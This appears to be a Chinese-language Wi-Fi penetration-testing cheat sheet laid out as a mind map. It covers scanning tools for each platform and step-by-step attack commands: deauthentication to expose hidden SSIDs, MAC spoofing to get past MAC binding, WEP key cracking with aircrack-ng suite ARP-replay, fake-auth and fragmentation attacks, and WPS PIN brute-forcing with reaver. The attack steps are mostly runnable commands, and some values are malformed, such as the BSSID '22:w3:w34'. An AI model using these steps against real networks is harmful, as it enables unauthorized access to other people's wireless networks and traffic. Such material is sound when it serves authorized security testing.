测试思维导图
测试工具集
windows platform
- Vistumbler 主动式扫描/Google Earth实时可视化/GPS定位KML文件生成器
- NetMon/ 被动嗅探
- AirPcap 被动嗅探/关联各种程序,如:cain,wireshark
- CommView 可以捕获加密通信的协议握手过程,导入到aircrack-ng中进行破解/数据发送功能/数据包注入[商业版]
os x platform
- KisMac 被动型扫描/数据包注入/GPS
linux platform
- Kismet 被动型扫描/捕获的数据包文件".pcap"中带GPS位置标签
- airodump-ng
测试步骤
防护:隐藏ssid, 绑定mac地址
隐藏ssid, 测试步骤:
- 1.使用aireplay-ng进shi行解除认证攻击[当检测到一个隐藏ssid];命令: aireplay-ng --deauth 1 -a 基本服务集标识 -c mac_address wlan0 原因:主要是没有管理帧保护
- 2.嗅探数据包
- 3.破解密钥或者弱口令
绑定Mac地址, 测试步骤:
- 1.解除认证,修改本地mac地址
- 2.修改本地mac地址和攻击一样,同时使用
- 3.等待下载,在使用修改的mac地址上线
测试wep无线网络:
有客户状态破解:
airmon-ng start wlan0 1 # 进入“检测模式”
ifconfig # 查看设置的模拟监听接口
airodump-ng wlan0mon # 对模拟监听接口进行数据包嗅探
airodump-ng --channel 1 --bssid 22:w3:w34 --write test mon0 # 根据channel和ssid捕获信息,生成test-01.pcap的数据包
aireplay-ng --arpreplay -h 客户端的mac -b bssid的mac mon0 # 获取更多的数据包,加快破解信息
aircrack-ng -b bssid的mac test-01.pcap #破解数据包,获取密钥
无客户端状态破解:
airodump-ng --channel 22 --bssid 22:w3:w34 --write quiet_type mon0
ifconfig mon0 | grep HWaddr
aireplay-ng --fakeauth 1 -o 1 -e quiet_type -b bssid的mac -h 无线网卡的mac地址 mon0 # 假认证; 如果假认证失败,就是ap使用绑定mac,使用上面的方法绕过mac地址绑定
aireplay-ng --fragment -e quiet_type -b bssid的mac -h bssid的mac mon0 # 启动碎片化攻击; 如果失败,使用chopchop攻击
# 制作arp包
# 注入制作的arp包
# 启动aircrack-ng
使用reaver破解:
1. 把无线网卡设置成监听模式: sudo airmon-ng start wlan0
这样就将wlan0无线网卡设置与监听模式,监听网卡id为 mon0
2. 用wash来查看AP是不是支持WPS:
-方法1, 搜索附近AP: 运行sudo wash -i mon0 -C
-方法2, 使用已经获取的cap文件: wash-C -f xxx01.cap
如果目标SSID在WPSlock一栏显示no,则证明可以继续破解,否则请不要继续用reaver来进行破解
4. 发现目标SSID支持WPS, 执行:sudo reaver -i mon0 -b AP_MAC -vv
其中 -i 后的参数是监听模式网卡id
-b 是目标路由的BSSID
-vv 显示详细信息
-L 防止路由WPS死锁
5. 在获得WPS PIN 之后可以快速破解登录密码,执行 reaver -i mon0-b AP_Mac -p WPS_PIN
其中 -i 后的参数是监听模式网卡id
-b是目标路由的BSSID
-p是已经获取的WPS PIN
6.破解出密码后在终端中输入 sudo airmon-ng stop mon0 关闭监控模式,不然无线网卡会一直向刚刚的AP进行注入的,用ctrl+c退出或者直接关闭终端都是不行的。
一般暴力破解WPS需要信号强度至少4-5格,这样的情况下,耗时平均为4-10个小时
测试wpa和wp2:
- http://topspeedsnail.com/kali-linux-crack-wifi-wpa/
参考